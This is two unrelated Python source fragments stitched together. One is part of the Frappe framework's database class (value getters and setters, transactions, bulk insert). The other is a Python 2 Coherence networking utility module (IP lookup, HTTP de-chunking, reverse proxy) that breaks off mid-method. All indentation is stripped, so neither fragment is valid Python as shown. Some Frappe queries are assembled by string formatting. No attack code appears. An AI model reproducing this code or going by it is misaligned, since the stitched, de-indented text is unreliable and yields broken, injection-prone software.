# returns default date_format
frappe.db.get_value("System Settings", None, "date_format")
"""
ret = self.get_values(doctype, filters, fieldname, ignore, as_dict, debug,
order_by, cache=cache, for_update=for_update)
return ((len(ret[0]) > 1 or as_dict) and ret[0] or ret[0][0]) if ret else None
def get_values(self, doctype, filters=None, fieldname="name", ignore=None, as_dict=False,
debug=False, order_by=None, update=None, cache=False, for_update=False):
"""Returns multiple document properties.
:param doctype: DocType name.
:param filters: Filters like `{"x":"y"}` or name of the document.
:param fieldname: Column name.
:param ignore: Don't raise exception if table, column is missing.
:param as_dict: Return values as dict.
:param debug: Print query in error log.
:param order_by: Column to order by
Example:
# return first customer starting with a
customers = frappe.db.get_values("Customer", {"name": ("like a%")})
# return last login of **User** `test@example.com`
user = frappe.db.get_values("User", "test@example.com", "*")[0]
"""
out = None
if cache and isinstance(filters, string_types) and \
(doctype, filters, fieldname) in self.value_cache:
return self.value_cache[(doctype, filters, fieldname)]
if not order_by: order_by = 'modified desc'
if isinstance(filters, list):
out = self._get_value_for_many_names(doctype, filters, fieldname, debug=debug)
else:
fields = fieldname
if fieldname!="*":
if isinstance(fieldname, string_types):
fields = [fieldname]
else:
fields = fieldname
if (filters is not None) and (filters!=doctype or doctype=="DocType"):
try:
out = self._get_values_from_table(fields, filters, doctype, as_dict, debug, order_by, update, for_update=for_update)
except Exception as e:
if ignore and (frappe.db.is_missing_column(e) or frappe.db.is_table_missing(e)):
# table or column not found, return None
out = None
elif (not ignore) and frappe.db.is_table_missing(e):
# table not found, look in singles
out = self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
else:
raise
else:
out = self.get_values_from_single(fields, filters, doctype, as_dict, debug, update)
if cache and isinstance(filters, string_types):
self.value_cache[(doctype, filters, fieldname)] = out
return out
def get_values_from_single(self, fields, filters, doctype, as_dict=False, debug=False, update=None):
"""Get values from `tabSingles` (Single DocTypes) (internal).
:param fields: List of fields,
:param filters: Filters (dict).
:param doctype: DocType name.
"""
# TODO
# if not frappe.model.meta.is_single(doctype):
# raise frappe.DoesNotExistError("DocType", doctype)
if fields=="*" or isinstance(filters, dict):
# check if single doc matches with filters
values = self.get_singles_dict(doctype)
if isinstance(filters, dict):
for key, value in filters.items():
if values.get(key) != value:
return []
if as_dict:
return values and [values] or []
if isinstance(fields, list):
# list() keeps the result concrete on Python 3, where map returns an iterator
return [list(map(values.get, fields))]
else:
r = self.sql("""select field, value
from `tabSingles` where field in (%s) and doctype=%s"""
% (', '.join(['%s'] * len(fields)), '%s'),
tuple(fields) + (doctype,), as_dict=False, debug=debug)
if as_dict:
if r:
r = frappe._dict(r)
if update:
r.update(update)
return [r]
else:
return []
else:
return r and [[i[1] for i in r]] or []
def get_singles_dict(self, doctype, debug = False):
"""Get Single DocType as dict.
:param doctype: DocType of the single object whose value is requested
Example:
# Get column and value of the single doctype Accounts Settings
account_settings = frappe.db.get_singles_dict("Accounts Settings")
"""
result = self.sql("""
SELECT field, value
FROM `tabSingles`
WHERE doctype = %s
""", doctype)
# result = _cast_result(doctype, result)
dict_ = frappe._dict(result)
return dict_
@staticmethod
def get_all(*args, **kwargs):
return frappe.get_all(*args, **kwargs)
@staticmethod
def get_list(*args, **kwargs):
return frappe.get_list(*args, **kwargs)
def get_single_value(self, doctype, fieldname, cache=False):
"""Get property of Single DocType. Cache locally by default
:param doctype: DocType of the single object whose value is requested
:param fieldname: `fieldname` of the property whose value is requested
Example:
# Get the default value of the company from the Global Defaults doctype.
company = frappe.db.get_single_value('Global Defaults', 'default_company')
"""
if doctype not in self.value_cache:
	self.value_cache[doctype] = {}
if fieldname in self.value_cache[doctype]:
return self.value_cache[doctype][fieldname]
val = self.sql("""select `value` from
`tabSingles` where `doctype`=%s and `field`=%s""", (doctype, fieldname))
val = val[0][0] if val else None
df = frappe.get_meta(doctype).get_field(fieldname)
if not df:
frappe.throw(_('Invalid field name: {0}').format(frappe.bold(fieldname)), self.InvalidColumnName)
if df.fieldtype in frappe.model.numeric_fieldtypes:
val = cint(val)
self.value_cache[doctype][fieldname] = val
return val
def get_singles_value(self, *args, **kwargs):
"""Alias for get_single_value"""
return self.get_single_value(*args, **kwargs)
def _get_values_from_table(self, fields, filters, doctype, as_dict, debug, order_by=None, update=None, for_update=False):
fl = []
if isinstance(fields, (list, tuple)):
for f in fields:
if "(" in f or " as " in f: # function
fl.append(f)
else:
fl.append("`" + f + "`")
fl = ", ".join(fl)
else:
fl = fields
if fields=="*":
as_dict = True
conditions, values = self.build_conditions(filters)
order_by = ("order by " + order_by) if order_by else ""
r = self.sql("select {fields} from `tab{doctype}` {where} {conditions} {order_by} {for_update}"
.format(
for_update = 'for update' if for_update else '',
fields = fl,
doctype = doctype,
where = "where" if conditions else "",
conditions = conditions,
order_by = order_by),
values, as_dict=as_dict, debug=debug, update=update)
return r
def _get_value_for_many_names(self, doctype, names, field, debug=False):
names = list(filter(None, names))
if names:
return self.get_all(doctype,
fields=['name', field],
filters=[['name', 'in', names]],
debug=debug, as_list=1)
else:
return {}
def update(self, *args, **kwargs):
"""Update multiple values. Alias for `set_value`."""
return self.set_value(*args, **kwargs)
def set_value(self, dt, dn, field, val=None, modified=None, modified_by=None,
update_modified=True, debug=False, for_update=True):
"""Set a single value in the database, do not call the ORM triggers
but update the modified timestamp (unless specified not to).
**Warning:** this function will not call Document events and should be avoided in normal cases.
:param dt: DocType name.
:param dn: Document name.
:param field: Property / field name or dictionary of values to be updated
:param val: Value to be updated.
:param modified: Use this as the `modified` timestamp.
:param modified_by: Set this user as `modified_by`.
:param update_modified: default True. Set as false, if you don't want to update the timestamp.
:param debug: Print the query in the developer / js console.
:param for_update: Will add a row-level lock to the value that is being set so that it can be released on commit.
"""
if not modified:
modified = now()
if not modified_by:
modified_by = frappe.session.user
to_update = {}
if update_modified:
to_update = {"modified": modified, "modified_by": modified_by}
if isinstance(field, dict):
to_update.update(field)
else:
to_update.update({field: val})
if dn and dt!=dn:
# with table
set_values = []
for key in to_update:
set_values.append('`{0}`=%({0})s'.format(key))
for name in self.get_values(dt, dn, 'name', for_update=for_update):
values = dict(name=name[0])
values.update(to_update)
self.sql("""update `tab{0}`
set {1} where name=%(name)s""".format(dt, ', '.join(set_values)),
values, debug=debug)
else:
# for singles
keys = list(to_update)
self.sql('''
delete from `tabSingles`
where field in ({0}) and
doctype=%s'''.format(', '.join(['%s']*len(keys))),
list(keys) + [dt], debug=debug)
for key, value in iteritems(to_update):
self.sql('''insert into `tabSingles` (doctype, field, value) values (%s, %s, %s)''',
(dt, key, value), debug=debug)
if dt in self.value_cache:
del self.value_cache[dt]
frappe.clear_document_cache(dt, dn)
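# A minimal usage sketch for set_value (document names here are hypothetical
# and assume an initialized frappe connection):
#
#   frappe.db.set_value("ToDo", "TODO-00001", "status", "Closed")
#
#   # several fields at once, passing a dict as `field`:
#   frappe.db.set_value("ToDo", "TODO-00001",
#       {"status": "Closed", "priority": "High"})
#
#   # for a Single DocType, dt == dn and `tabSingles` is updated instead:
#   frappe.db.set_value("System Settings", "System Settings", "enable_scheduler", 1)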
@staticmethod
def set(doc, field, val):
"""Set value in document. **Avoid**"""
doc.db_set(field, val)
def touch(self, doctype, docname):
"""Update the modified timestamp of this document."""
modified = now()
self.sql("""update `tab{doctype}` set `modified`=%s
where name=%s""".format(doctype=doctype), (modified, docname))
return modified
@staticmethod
def set_temp(value):
"""Set a temperory value and return a key."""
key = frappe.generate_hash()
frappe.cache().hset("temp", key, value)
return key
@staticmethod
def get_temp(key):
"""Return the temperory value and delete it."""
return frappe.cache().hget("temp", key)
def set_global(self, key, val, user='__global'):
"""Save a global key value. Global values will be automatically set if they match fieldname."""
self.set_default(key, val, user)
def get_global(self, key, user='__global'):
"""Returns a global key value."""
return self.get_default(key, user)
def get_default(self, key, parent="__default"):
"""Returns default value as a list if multiple or single"""
d = self.get_defaults(key, parent)
return isinstance(d, list) and d[0] or d
@staticmethod
def set_default(key, val, parent="__default", parenttype=None):
"""Sets a global / user default value."""
frappe.defaults.set_default(key, val, parent, parenttype)
@staticmethod
def add_default(key, val, parent="__default", parenttype=None):
"""Append a default value for a key, there can be multiple default values for a particular key."""
frappe.defaults.add_default(key, val, parent, parenttype)
@staticmethod
def get_defaults(key=None, parent="__default"):
"""Get all defaults"""
if key:
defaults = frappe.defaults.get_defaults(parent)
d = defaults.get(key, None)
if not d and key != frappe.scrub(key):
d = defaults.get(frappe.scrub(key), None)
return d
else:
return frappe.defaults.get_defaults(parent)
def begin(self):
self.sql("START TRANSACTION")
def commit(self):
"""Commit current transaction. Calls SQL `COMMIT`."""
self.sql("commit")
frappe.local.rollback_observers = []
self.flush_realtime_log()
enqueue_jobs_after_commit()
flush_local_link_count()
@staticmethod
def flush_realtime_log():
for args in frappe.local.realtime_log:
frappe.realtime.emit_via_redis(*args)
frappe.local.realtime_log = []
def rollback(self):
"""`ROLLBACK` current transaction."""
self.sql("rollback")
self.begin()
for obj in frappe.local.rollback_observers:
if hasattr(obj, "on_rollback"):
obj.on_rollback()
frappe.local.rollback_observers = []
def field_exists(self, dt, fn):
"""Return true of field exists."""
return self.exists('DocField', {
'fieldname': fn,
'parent': dt
})
def table_exists(self, doctype):
"""Returns True if table for given doctype exists."""
return ("tab" + doctype) in self.get_tables()
def get_tables(self):
tables = frappe.cache().get_value('db_tables')
if not tables:
table_rows = self.sql("""
SELECT table_name
FROM information_schema.tables
WHERE table_schema NOT IN ('pg_catalog', 'information_schema')
""")
tables = {d[0] for d in table_rows}
frappe.cache().set_value('db_tables', tables)
return tables
def a_row_exists(self, doctype):
"""Returns True if atleast one row exists."""
return self.sql("select name from `tab{doctype}` limit 1".format(doctype=doctype))
def exists(self, dt, dn=None, cache=False):
"""Returns true if document exists.
:param dt: DocType name.
:param dn: Document name or filter dict."""
if isinstance(dt, string_types):
if dt!="DocType" and dt==dn:
return True # single always exists (!)
try:
return self.get_value(dt, dn, "name", cache=cache)
except Exception:
return None
elif isinstance(dt, dict) and dt.get('doctype'):
try:
conditions = []
for d in dt:
if d == 'doctype': continue
conditions.append([d, '=', dt[d]])
return self.get_all(dt['doctype'], filters=conditions, as_list=1)
except Exception:
return None
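# Usage sketch (hypothetical values; assumes an initialized frappe connection):
#
#   frappe.db.exists("User", "admin@example.com")   # lookup by document name
#   frappe.db.exists({"doctype": "User", "email": "admin@example.com"})  # by filter dict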
def count(self, dt, filters=None, debug=False, cache=False):
"""Returns `COUNT(*)` for given DocType and filters."""
if cache and not filters:
cache_count = frappe.cache().get_value('doctype:count:{}'.format(dt))
if cache_count is not None:
return cache_count
if filters:
conditions, filters = self.build_conditions(filters)
count = self.sql("""select count(*)
from `tab%s` where %s""" % (dt, conditions), filters, debug=debug)[0][0]
return count
else:
count = self.sql("""select count(*)
from `tab%s`""" % (dt,))[0][0]
if cache:
frappe.cache().set_value('doctype:count:{}'.format(dt), count, expires_in_sec = 86400)
return count
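# Usage sketch (hypothetical doctype and filters):
#
#   frappe.db.count("ToDo", filters={"status": "Open"})
#   frappe.db.count("ToDo", cache=True)  # unfiltered count, cached for a day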
@staticmethod
def format_date(date):
return getdate(date).strftime("%Y-%m-%d")
@staticmethod
def format_datetime(datetime):
if not datetime:
return '0001-01-01 00:00:00.000000'
if isinstance(datetime, frappe.string_types):
if ':' not in datetime:
datetime = datetime + ' 00:00:00.000000'
else:
datetime = datetime.strftime("%Y-%m-%d %H:%M:%S.%f")
return datetime
def get_creation_count(self, doctype, minutes):
"""Get count of records created in the last x minutes"""
from frappe.utils import now_datetime
from dateutil.relativedelta import relativedelta
return self.sql("""select count(name) from `tab{doctype}`
where creation >= %s""".format(doctype=doctype),
now_datetime() - relativedelta(minutes=minutes))[0][0]
def get_db_table_columns(self, table):
"""Returns list of column names from given table."""
columns = frappe.cache().hget('table_columns', table)
if columns is None:
columns = [r[0] for r in self.sql('''
select column_name
from information_schema.columns
where table_name = %s ''', table)]
if columns:
frappe.cache().hset('table_columns', table, columns)
return columns
def get_table_columns(self, doctype):
"""Returns list of column names from given doctype."""
columns = self.get_db_table_columns('tab' + doctype)
if not columns:
raise self.TableMissingError('DocType', doctype)
return columns
def has_column(self, doctype, column):
"""Returns True if column exists in database."""
return column in self.get_table_columns(doctype)
def get_column_type(self, doctype, column):
return self.sql('''SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS
WHERE table_name = 'tab{0}' AND column_name = '{1}' '''.format(doctype, column))[0][0]
def has_index(self, table_name, index_name):
pass
def add_index(self, doctype, fields, index_name=None):
pass
def add_unique(self, doctype, fields, constraint_name=None):
pass
@staticmethod
def get_index_name(fields):
index_name = "_".join(fields) + "_index"
# remove index length if present e.g. (10) from index name
index_name = re.sub(r"\s*\([^)]+\)\s*", r"", index_name)
return index_name
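# A sketch of the transformation performed above:
#
#   Database.get_index_name(["customer", "posting_date(10)"])
#   # -> "customer_posting_date_index"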
def get_system_setting(self, key):
def _load_system_settings():
return self.get_singles_dict("System Settings")
return frappe.cache().get_value("system_settings", _load_system_settings).get(key)
def close(self):
"""Close database connection."""
if self._conn:
# self._cursor.close()
self._conn.close()
self._cursor = None
self._conn = None
@staticmethod
def escape(s, percent=True):
"""Excape quotes and percent in given string."""
# implemented in specific class
pass
@staticmethod
def is_column_missing(e):
return frappe.db.is_missing_column(e)
def get_descendants(self, doctype, name):
'''Return descendants of the current record'''
node_location_indexes = self.get_value(doctype, name, ('lft', 'rgt'))
if node_location_indexes:
lft, rgt = node_location_indexes
return self.sql_list('''select name from `tab{doctype}`
where lft > {lft} and rgt < {rgt}'''.format(doctype=doctype, lft=lft, rgt=rgt))
else:
# when document does not exist
return []
def is_missing_table_or_column(self, e):
return self.is_missing_column(e) or self.is_missing_table(e)
def multisql(self, sql_dict, values=(), **kwargs):
current_dialect = frappe.db.db_type or 'mariadb'
query = sql_dict.get(current_dialect)
return self.sql(query, values, **kwargs)
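# Usage sketch: supply one query per dialect and the one matching the active
# backend is executed (dialect keys are assumed to match frappe.db.db_type):
#
#   frappe.db.multisql({
#       'mariadb': "select `name` from `tabUser` limit 10",
#       'postgres': 'select "name" from "tabUser" limit 10',
#   })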
def delete(self, doctype, conditions):
if conditions:
conditions, values = self.build_conditions(conditions)
return self.sql("DELETE FROM `tab{doctype}` where {conditions}".format(
doctype=doctype,
conditions=conditions
), values)
else:
frappe.throw(_('No conditions provided'))
def get_last_created(self, doctype):
last_record = self.get_all(doctype, ('creation'), limit=1, order_by='creation desc')
if last_record:
return get_datetime(last_record[0].creation)
else:
return None
def clear_table(self, doctype):
self.sql('truncate `tab{}`'.format(doctype))
def log_touched_tables(self, query, values=None):
if values:
query = frappe.safe_decode(self._cursor.mogrify(query, values))
if query.strip().lower().split()[0] in ('insert', 'delete', 'update', 'alter'):
# single_word_regex is designed to match following patterns
# `tabXxx`, tabXxx and "tabXxx"
# multi_word_regex is designed to match following patterns
# `tabXxx Xxx` and "tabXxx Xxx"
# ([`"]?) Captures " or ` at the beginning of the table name (if provided)
# \1 matches the first captured group (quote character) at the end of the table name
# multi word table name must have surrounding quotes.
# (tab([A-Z]\w+)( [A-Z]\w+)*) Captures table names that start with "tab"
# and are continued with multiple words that start with a capital letter
# e.g. 'tabXxx' or 'tabXxx Xxx' or 'tabXxx Xxx Xxx' and so on
single_word_regex = r'([`"]?)(tab([A-Z]\w+))\1'
multi_word_regex = r'([`"])(tab([A-Z]\w+)( [A-Z]\w+)+)\1'
tables = []
for regex in (single_word_regex, multi_word_regex):
tables += [groups[1] for groups in re.findall(regex, query)]
if frappe.flags.touched_tables is None:
frappe.flags.touched_tables = set()
frappe.flags.touched_tables.update(tables)
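# A sketch of what the two patterns above extract (hypothetical queries):
#
#   update `tabUser` set ...             -> tabUser           (single_word_regex)
#   delete from "tabSales Invoice" ...   -> tabSales Invoice  (multi_word_regex)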
def bulk_insert(self, doctype, fields, values, ignore_duplicates=False):
"""
Insert multiple records at a time
:param doctype: Doctype name
:param fields: list of fields
:param values: list of lists of values
"""
insert_list = []
fields = ", ".join(["`"+field+"`" for field in fields])
for idx, value in enumerate(values):
insert_list.append(tuple(value))
# flush every 10,000 rows and after the final row
if (idx + 1) % 10000 == 0 or idx == len(values) - 1:
self.sql("""INSERT {ignore_duplicates} INTO `tab{doctype}` ({fields}) VALUES {values}""".format(
ignore_duplicates="IGNORE" if ignore_duplicates else "",
doctype=doctype,
fields=fields,
values=", ".join(['%s'] * len(insert_list))
), tuple(insert_list))
insert_list = []
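# Usage sketch (hypothetical doctype and rows):
#
#   frappe.db.bulk_insert("Note", ["name", "title"],
#       [["note-00001", "first"], ["note-00002", "second"]],
#       ignore_duplicates=True)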
def enqueue_jobs_after_commit():
if frappe.flags.enqueue_after_commit and len(frappe.flags.enqueue_after_commit) > 0:
for job in frappe.flags.enqueue_after_commit:
q = get_queue(job.get("queue"), is_async=job.get("is_async"))
q.enqueue_call(execute_job, timeout=job.get("timeout"),
kwargs=job.get("queue_args"))
frappe.flags.enqueue_after_commit = []
# Helpers
def _cast_result(doctype, result):
batch = [ ]
try:
for field, value in result:
df = frappe.get_meta(doctype).get_field(field)
if df:
value = cast_fieldtype(df.fieldtype, value)
batch.append(tuple([field, value]))
except frappe.exceptions.DoesNotExistError:
return result
return tuple(batch)
|
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright (C) 2006 Fluendo, S.A. (www.fluendo.com).
# Copyright 2006, Frank Scholz <coherence@beebits.net>
import urlparse
from urlparse import urlsplit
from coherence.extern.et import parse_xml as et_parse_xml
from coherence import SERVER_ID
from twisted.web import server, http, static
from twisted.web import client, error
from twisted.web import proxy, resource, server
from twisted.internet import reactor,protocol,defer,abstract
from twisted.python import failure
from twisted.python.util import InsensitiveDict
try:
from twisted.protocols._c_urlarg import unquote
except ImportError:
from urllib import unquote
try:
import netifaces
have_netifaces = True
except ImportError:
have_netifaces = False
def means_true(value):
if isinstance(value,basestring):
value = value.lower()
return value in [True,1,'1','true','yes','ok']
def generalise_boolean(value):
""" standardize the different boolean incarnations
transform anything that looks like a "True" into a '1',
and everything else into a '0'
"""
if means_true(value):
return '1'
return '0'
generalize_boolean = generalise_boolean
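# e.g. generalise_boolean('Yes') -> '1'; generalise_boolean('off') -> '0'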
def parse_xml(data, encoding="utf-8"):
return et_parse_xml(data,encoding)
def parse_http_response(data):
""" don't try to get the body, there are reponses without """
header = data.split('\r\n\r\n')[0]
lines = header.split('\r\n')
cmd = lines[0].split(' ')
lines = map(lambda x: x.replace(': ', ':', 1), lines[1:])
lines = filter(lambda x: len(x) > 0, lines)
headers = [x.split(':', 1) for x in lines]
headers = dict(map(lambda x: (x[0].lower(), x[1]), headers))
return cmd, headers
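# A sketch of the parsing above on a minimal SSDP-style response:
#
#   cmd, headers = parse_http_response(
#       'HTTP/1.1 200 OK\r\nST: upnp:rootdevice\r\nUSN: uuid:1234\r\n\r\n')
#   # cmd     -> ['HTTP/1.1', '200', 'OK']
#   # headers -> {'st': 'upnp:rootdevice', 'usn': 'uuid:1234'}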
def get_ip_address(ifname):
"""
determine the IP address by interface name
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/439094
(c) Paul Cannon
Uses the Linux SIOCGIFADDR ioctl to find the IP address associated
with a network interface, given the name of that interface, e.g. "eth0".
The address is returned as a string containing a dotted quad.
Updated to work on BSD. OpenBSD and OSX share the same value for
SIOCGIFADDR, and it's likely that other BSDs do too.
Updated to work on Windows,
using the optional Python module netifaces
http://alastairs-place.net/netifaces/
Thx Lawrence for that patch!
"""
if have_netifaces:
if ifname in netifaces.interfaces():
iface = netifaces.ifaddresses(ifname)
ifaceadr = iface[netifaces.AF_INET]
# we now have a list of address dictionaries; there may be multiple addresses bound
return ifaceadr[0]['addr']
import sys
if sys.platform in ('win32','sunos5'):
return '127.0.0.1'
from os import uname
import socket
import fcntl
import struct
system_type = uname()[0]
if system_type == "Linux":
SIOCGIFADDR = 0x8915
else:
SIOCGIFADDR = 0xc0206921
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
SIOCGIFADDR,
struct.pack('256s', ifname[:15])
)[20:24])
except:
return '127.0.0.1'
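# Usage sketch (the interface name is platform-dependent and hypothetical):
#
#   get_ip_address('eth0')  # -> e.g. '192.168.1.10', or '127.0.0.1' on failure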
def get_host_address():
""" try to get determine the interface used for
the default route, as this is most likely
the interface we should bind to (on a single homed host!)
"""
import sys
if sys.platform == 'win32':
if have_netifaces:
interfaces = netifaces.interfaces()
if len(interfaces):
return get_ip_address(interfaces[0]) # on windows assume first interface is primary
else:
try:
route_file = '/proc/net/route'
route = open(route_file)
if route:
tmp = route.readline() #skip first line
while (tmp != ''):
tmp = route.readline()
l = tmp.split('\t')
if (len(l) > 2):
if l[1] == '00000000': #default route...
route.close()
return get_ip_address(l[0])
except IOError, msg:
""" fallback to parsing the output of netstat """
from twisted.internet import utils
def result(r):
from os import uname
(osname,_, _, _,_) = uname()
osname = osname.lower()
lines = r.split('\n')
for l in lines:
l = l.strip(' \r\n')
parts = [x.strip() for x in l.split(' ') if len(x) > 0]
if parts[0] in ('0.0.0.0','default'):
if osname[:6] == 'darwin':
return get_ip_address(parts[5])
else:
return get_ip_address(parts[-1])
return '127.0.0.1'
def fail(f):
return '127.0.0.1'
d = utils.getProcessOutput('netstat', ['-rn'])
d.addCallback(result)
d.addErrback(fail)
return d
except Exception, msg:
import traceback
traceback.print_exc()
""" return localhost if we haven't found anything """
return '127.0.0.1'
def de_chunk_payload(response):
""" This method takes a chunked HTTP data object and unchunks it."""
try:
import cStringIO as StringIO
except ImportError:
import StringIO
newresponse = StringIO.StringIO()
# chunked encoding consists of a bunch of lines with
# a length in hex followed by a data chunk and a CRLF pair.
response = StringIO.StringIO(response)
def read_chunk_length():
line = response.readline()
try:
length = int(line.strip(), 16)
except ValueError:
length = 0
return length
length = read_chunk_length()
while length > 0:
newresponse.write(response.read(length))
line = response.readline() # after chunk and before next chunk length
length = read_chunk_length()
return newresponse.getvalue()
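# A sketch of the unchunking above (chunk sizes in hex, each chunk followed
# by a CRLF pair, terminated by a zero-length chunk):
#
#   de_chunk_payload('4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n')  # -> 'Wikipedia'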
class Request(server.Request):
def process(self):
"Process a request."
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader('server', SERVER_ID)
self.setHeader('date', http.datetimeToString())
self.setHeader('content-type', "text/html")
# Resource Identification
self.prepath = []
self.postpath = map(unquote, self.path[1:].split('/'))
try:
def deferred_rendering(r):
self.render(r)
resrc = self.site.getResourceFor(self)
if isinstance(resrc, defer.Deferred):
resrc.addCallback(deferred_rendering)
resrc.addErrback(self.processingFailed)
else:
self.render(resrc)
except:
self.processingFailed(failure.Failure())
class Site(server.Site):
noisy = False
requestFactory = Request
def startFactory(self):
pass
#http._logDateTimeStart()
class ProxyClient(http.HTTPClient):
"""Used by ProxyClientFactory to implement a simple web proxy."""
def __init__(self, command, rest, version, headers, data, father):
self.father = father
self.command = command
self.rest = rest
if headers.has_key("proxy-connection"):
del headers["proxy-connection"]
#headers["connection"] = "close"
self.headers = headers
#print "command", command
#print "rest", rest
#print "headers", headers
self.data = data
self.send_data = 0
def connectionMade(self):
self.sendCommand(self.command, self.rest)
for header, value in self.headers.items():
self.sendHeader(header, value)
self.endHeaders()
self.transport.write(self.data)
def handleStatus(self, version, code, message):
if message:
# Add a whitespace to message, this allows empty messages
# transparently
message = " %s" % (message,)
if version == 'ICY':
version = 'HTTP/1.1'
#print "ProxyClient handleStatus", version, code, message
self.father.transport.write("%s %s %s\r\n" % (version, code, message))
def handleHeader(self, key, value):
#print "ProxyClient handleHeader", key, value
if not key.startswith('icy-'):
#print "ProxyClient handleHeader", key, value
self.father.transport.write("%s: %s\r\n" % (key, value))
def handleEndHeaders(self):
#self.father.transport.write("%s: %s\r\n" % ( 'Keep-Alive', ''))
#self.father.transport.write("%s: %s\r\n" % ( 'Accept-Ranges', 'bytes'))
#self.father.transport.write("%s: %s\r\n" % ( 'Content-Length', '2000000'))
#self.father.transport.write("%s: %s\r\n" % ( 'Date', 'Mon, 26 Nov 2007 11:04:12 GMT'))
#self.father.transport.write("%s: %s\r\n" % ( 'Last-Modified', 'Sun, 25 Nov 2007 23:19:51 GMT'))
##self.father.transport.write("%s: %s\r\n" % ( 'Server', 'Apache/2.0.52 (Red Hat)'))
self.father.transport.write("\r\n")
def handleResponsePart(self, buffer):
#print "ProxyClient handleResponsePart", len(buffer), self.father.chunked
self.send_data += len(buffer)
self.father.write(buffer)
def handleResponseEnd(self):
#print "handleResponseEnd", self.send_data
self.transport.loseConnection()
self.father.channel.transport.loseConnection()
class ProxyClientFactory(protocol.ClientFactory):
"""
Used by ProxyRequest to implement a simple web proxy.
"""
protocol = proxy.ProxyClient
def __init__(self, command, rest, version, headers, data, father):
self.father = father
self.command = command
self.rest = rest
self.headers = headers
self.data = data
self.version = version
def buildProtocol(self, addr):
return self.protocol(self.command, self.rest, self.version,
self.headers, self.data, self.father)
def clientConnectionFailed(self, connector, reason):
self.father.transport.write("HTTP/1.0 501 Gateway error\r\n")
self.father.transport.write("Content-Type: text/html\r\n")
self.father.transport.write("\r\n")
self.father.transport.write('''<H1>Could not connect</H1>''')
self.father.transport.loseConnection()
class ReverseProxyResource(proxy.ReverseProxyResource):
"""
Resource that renders the results gotten from another server
Put this resource in the tree to cause everything below it to be relayed
to a different server.
@ivar proxyClientFactoryClass: a proxy client factory class, used to create
new connections.
@type proxyClientFactoryClass: L{ClientFactory}
@ivar reactor: the reactor used to create connections.
@type reactor: object providing L{twisted.internet.interfaces.IReactorTCP}
"""
proxyClientFactoryClass = ProxyClientFactory
def __init__(self, host, port, path, reactor=reactor):
"""
@param host: the host of the web server to proxy.
@type host: C{str}
@param port: the port of the web server to proxy.
@type port: C{int}
@param path: the base path to fetch data from. Note that you shouldn't
put any trailing slashes in it, it will be added automatically in
request. For example, if you put B{/foo}, a request on B{/bar} will
be proxied to B{/foo/bar}.
@type path: C{str}
"""
resource.Resource.__init__(self)
self.host = host
self.port = port
self.path = path
self.qs = ''
self.reactor = reactor
def getChild(self, path, request):
return ReverseProxyResource(
self.host, self.port, self.path + '/' + path)
def render(self, request):
"""
Render a request by forwarding it to the proxied server.
"""
# RFC 2616 tells us that we can omit the port if it's the default port,
# but we have to provide it otherwise
if self.port == 80:
request.received_headers['host'] = self.host
else:
request.received_headers['host'] = "%s:%d" % (self.host, self.port)
request.content.seek(0, 0)
qs = urlparse.urlparse(request.uri)[4]
if qs == '':
qs = self.qs
if qs:
rest = self.path + '?' + qs
else:
rest = self.path
clientFactory = self.proxyClientFactoryClass(
request.method, rest, request.clientproto,
request.getAllHeaders(), request.content.read(), request)
self.reactor.connectTCP(self.host, self.port, clientFactory)
return server.NOT_DONE_YET
def resetTarget(self,host,port,path,qs=''):
self.host = host
self.port = port
self.path = path
self.qs = qs
class ReverseProxyUriResource(ReverseProxyResource):
uri = None
def __init__(self, uri, reactor=reactor):
self.uri = uri
_,host_port,path,params,_ = urlsplit(uri)
if host_port.find(':') != -1:
host,port = tuple(host_port.split(':'))
port = int(port)
else:
host = host_port
port = 80
if path =='':
path = '/'
if params == '':
rest = path
else:
rest = '?'.join((path, params))
ReverseProxyResource.__init__(self, host, port, rest, reactor)
def resetUri (self, uri):
self.uri = uri
_,host_port,path,params,_ = urlsplit(uri)
if host_port.find(':') != -1:
host,port = tuple(host_port.split(':'))
port = int(port)
else:
host = host_port
port = 80
self.resetTarget(host, port, path, params)
class myHTTPPageGetter(client.HTTPPageGetter):
followRedirect = True
def connectionMade(self):
method = getattr(self, 'method', 'GET')
#print "myHTTPPageGetter", method, self.factory.path
self.sendCommand(method, self.factory.path)
self.sendHeader('Host', self.factory.headers.get("host", self.factory.host))
self.sendHeader('User-Agent', self.factory.agent)
if self.factory.cookies:
l=[]
for cookie, cookval in self.factory.cookies.items():
l.append('%s=%s' % (cookie, cookval))
self.sendHeader('Cookie', '; '.join(l))
data = getattr(self.factory, 'postdata', None)
if data is not None:
self.sendHeader("Content-Length", str(len(data)))
for (key, value) in self.factory.headers.items():
if key.lower() != "content-length":
# we calculated it on our own
self.sendHeader(key, value)
self.endHeaders()
self.headers = {}
if data is not None:
self.transport.write(data)
def handleResponse(self, response):
if self.quietLoss:
return
if self.failed:
self.factory.noPage(
failure.Failure(
error.Error(
self.status, self.message, response)))
elif self.factory.method != 'HEAD' and self.length is not None and self.length != 0:
self.factory.noPage(failure.Failure(
client.PartialDownloadError(self.status, self.message, response)))
else:
if(self.headers.has_key('transfer-encoding') and
self.headers['transfer-encoding'][0].lower() == 'chunked'):
self.factory.page(de_chunk_payload(response))
else:
self.factory.page(response)
# server might be stupid and not close connection. admittedly
# the fact we do only one request per connection is also
# stupid...
self.quietLoss = 1
self.transport.loseConnection()
class HeaderAwareHTTPClientFactory(client.HTTPClientFactory):
protocol = myHTTPPageGetter
noisy = False
def __init__(self, url, method='GET', postdata=None, headers=None,
agent="Twisted PageGetter", timeout=0, cookies=None,
followRedirect=True, redirectLimit=20):
self.followRedirect = followRedirect
self.redirectLimit = redirectLimit
self._redirectCount = 0
self.timeout = timeout
self.agent = agent
if cookies is None:
cookies = {}
self.cookies = cookies
if headers is not None:
self.headers = InsensitiveDict(headers)
else:
self.headers = InsensitiveDict()
if postdata is not None:
self.headers.setdefault('Content-Length', len(postdata))
# just in case a broken http/1.1 decides to keep connection alive
self.headers.setdefault("connection", "close")
self.postdata = postdata
self.method = method
self.setURL(url)
self.waiting = 1
self.deferred = defer.Deferred()
self.response_headers = None
def buildProtocol(self, addr):
p = protocol.ClientFactory.buildProtocol(self, addr)
p.method = self.method
p.followRedirect = self.followRedirect
if self.timeout:
timeoutCall = reactor.callLater(self.timeout, p.timeout)
